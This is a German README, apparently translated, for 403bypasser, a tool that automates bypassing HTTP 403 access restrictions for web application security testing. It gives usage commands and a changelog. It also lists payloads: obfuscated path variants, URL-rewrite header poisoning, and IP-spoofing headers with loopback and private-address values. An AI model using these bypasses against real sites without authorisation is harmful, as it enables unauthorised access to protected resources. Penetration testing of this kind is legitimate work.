
Automatisiert Techniken zur Umgehung der HTTP-403-Zugriffskontrolle durch Header-Manipulation, Pfadverschleierung und HTTP-Methodenkonvertierung für Sicherheitstests von Webanwendungen.

403bypasser automatisiert die Techniken, die verwendet werden, um Zugangskontrollbeschränkungen auf Zielseiten zu umgehen. Dieses Tool wird weiterentwickelt und ist offen für Beiträge.
403bypasser automatisiert die Techniken, die verwendet werden, um Zugangskontrollbeschränkungen auf Zielseiten zu umgehen. 403bypasser wird weiter verbessert und ist offen für Beiträge.
git clone https://github.com/yunemse48/403bypasser.gitpip install -r requirements.txtArgumente:
| Argument | Beschreibung | Beispiele | Hinweis |
|---|---|---|---|
| -u | einzelne zu scannende URL | http://example.com or http://example.com/ | Alle diese Beispielverwendungen werden gleich interpretiert |
| -U | Pfad zu einer Liste von URLs | ./urllist.txt, ../../urllist.txt, etc. | Geben Sie einfach den Pfad an, in dem sich die Datei befindet :) |
| -d | einzelnes zu scannendes Verzeichnis | admin or /admin or admin/ or /admin/ | Alle diese Beispielverwendungen werden gleich interpretiert |
| -D | Pfad zu einer Liste von Verzeichnissen | ./dirlist.txt, ../../dirlist.txt, etc. | Geben Sie einfach den Pfad an, in dem sich die Datei befindet :) |
Verwendung 1: python3 403bypasser.py -u https://example.com -d /secret
Verwendung 2: python3 403bypasser.py -u https://example.com -D dirlist.txt
Verwendung 3: python3 403bypasser.py -U urllist.txt -d /secret
Verwendung 4: python3 403bypasser.py -U urllist.txt -D dirlist.txt
WICHTIGER HINWEIS: Alle folgenden werden gleich interpretiert. Daher ist es nur eine Frage der Präferenz, welches Muster Sie verwenden.
python3 403bypasser.py -u https://example.com -d secretpython3 403bypasser.py -u https://example.com -d /secretpython3 403bypasser.py -u https://example.com -d /secret/python3 403bypasser.py -u https://example.com -d secret/python3 403bypasser.py -u https://example.com/ -d secretDa Python eine plattformübergreifende Sprache ist, kann man dieses Programm auf verschiedenen Betriebssystemen ausführen.
Die Ausgabe des Programms wird (im aktuellen Verzeichnis) in einer Datei mit dem Namen der als Eingabe angegebenen Domain gespeichert.
Zum Beispiel:
python3 403bypasser.py -u https://example.com -d /secret wird angegeben. Dann wird die Ausgabe in der Datei example.txt im aktuellen Verzeichnis gespeichert.
Änderungen in v2.0: In dieser Version wurden erhebliche Änderungen vorgenommen. Das Projekt wurde vollständig von Bash auf Python 3 umgestellt. Es wurden neue und vielfältige Techniken hinzugefügt.
Änderungen in v1.1: Es ist jetzt möglich, Dateien (Listen) als Eingabe über Argumente an 403bypasser zu übergeben. Darüber hinaus wurden zwei weitere Testfälle hinzugefügt: Poisoning mit 1) X-Original-URL und 2) X-Rewrite-URL-Headern.
/%2e/secret/secret//secret..;//secret/..;//secret%20/secret%09/secret%00/secret.json/secret.css/secret.html/secret?/secret??/secret???/secret?testparam/secret#/secret#test/secret/.//secret///./secret/./X-Original-URL: /secretX-Rewrite-URL: /secretHeader:
X-Custom-IP-AuthorizationX-Forwarded-ForX-Forward-ForX-Remote-IPX-Originating-IPX-Remote-AddrX-Client-IPX-Real-IPWerte:
localhostlocalhost:80localhost:443127.0.0.1127.0.0.1:80127.0.0.1:44321307064330x7F0000010177.0000.0000.00010127.110.0.0.010.0.0.1172.16.0.0172.16.0.1192.168.1.0192.168.1.1